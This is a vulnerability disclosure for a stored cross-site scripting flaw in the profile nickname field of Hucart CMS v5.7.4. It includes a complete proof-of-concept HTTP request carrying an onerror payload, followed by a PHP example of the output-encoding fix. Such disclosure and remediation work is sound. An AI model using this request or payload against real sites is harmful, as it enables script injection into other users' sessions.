Hucart CMS v5.7.4 XSS vulnerability analysis
Code analysis
When a user updates their profile information, the submitted data is stored without filtering dangerous characters, which results in a stored XSS vulnerability.
After the EXP has been sent, browsing the user's information triggers the XSS vulnerability.
POC
First register an account:
http://127.0.0.1/hucart/user/index.php?load=login&act=reg
Then log in.
The EXP packet is provided below.
Insert the XSS payload into the nickname field (usd_nick).
The payload is triggered when the user's basic information is viewed.
POST /hucart/user/index.php?load=user_info&act=update_user HTTP/1.1
Host: 192.168.0.110
Content-Length: 1541
Cache-Control: max-age=0
Origin: http://192.168.0.110
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygIVXHhUwlupAJTnM
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.110/hucart/user/?load=user_info&act=info_list
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k2mlv9rtdavtioa98nqajithm5; bdshare_firstime=1550149965528; ck_num=79385312dbee4c9e7270b26e4b3e1459
Connection: close

------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_nick"

"><img src=# onerror=alert(1)>
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_image"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_truename"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_birthday"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_salt"

0
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_msn"

admin
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_qq"

123123
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_officephone"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_homephone"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_tel"

123123
------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="province"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="city"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="district"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="pcd_all"


------WebKitFormBoundarygIVXHhUwlupAJTnM
Content-Disposition: form-data; name="usd_address"


------WebKitFormBoundarygIVXHhUwlupAJTnM--
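The following is an added example, not Hucart's own code: a minimal PHP model of the store-then-display flow the analysis describes, with the unfiltered pattern next to the hardened one. The function names and the in-memory `$profileStore` array are assumptions made for the illustration.

```php
<?php
// Added example: models the update_user / info view flow described above.
// Function names and the in-memory store are assumptions, not Hucart code.

$profileStore = [];   // stands in for the user table (constructed for the example)

// Vulnerable pattern: the submitted nickname is stored as-is and later
// concatenated into HTML without encoding, so markup in usd_nick is rendered
// as markup when the profile page is viewed (stored XSS).
function update_user_vulnerable(array $post, int $uid, array &$store): void {
    $store[$uid]['usd_nick'] = $post['usd_nick'] ?? '';
}
function render_nick_vulnerable(int $uid, array $store): string {
    return '<span class="nick">' . $store[$uid]['usd_nick'] . '</span>';
}

// Hardened pattern: encode at the output boundary (the fix that actually
// closes the bug), and bound the stored value so less junk can be persisted.
function update_user_fixed(array $post, int $uid, array &$store): void {
    $nick = trim((string)($post['usd_nick'] ?? ''));
    if ($nick === '' || mb_strlen($nick, 'UTF-8') > 32) {
        throw new InvalidArgumentException('nickname must be 1-32 characters');
    }
    $store[$uid]['usd_nick'] = $nick;
}
function render_nick_fixed(int $uid, array $store): string {
    // ENT_QUOTES escapes both quote styles so the value cannot break out of
    // an attribute either; ENT_SUBSTITUTE keeps invalid UTF-8 from blanking
    // the whole string, which would otherwise silently hide the field.
    $safe = htmlspecialchars($store[$uid]['usd_nick'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<span class="nick">' . $safe . '</span>';
}

// Run both paths with the payload from the PoC request above.
$payload = ['usd_nick' => '"><img src=# onerror=alert(1)>'];

update_user_vulnerable($payload, 1, $profileStore);
echo render_nick_vulnerable(1, $profileStore), PHP_EOL;   // markup echoed verbatim

update_user_fixed($payload, 1, $profileStore);
echo render_nick_fixed(1, $profileStore), PHP_EOL;        // markup rendered as inert text
```

The same `htmlspecialchars` call belongs on every other profile field the info page prints (usd_truename, usd_address, and so on), since the request shows they travel through the same handler.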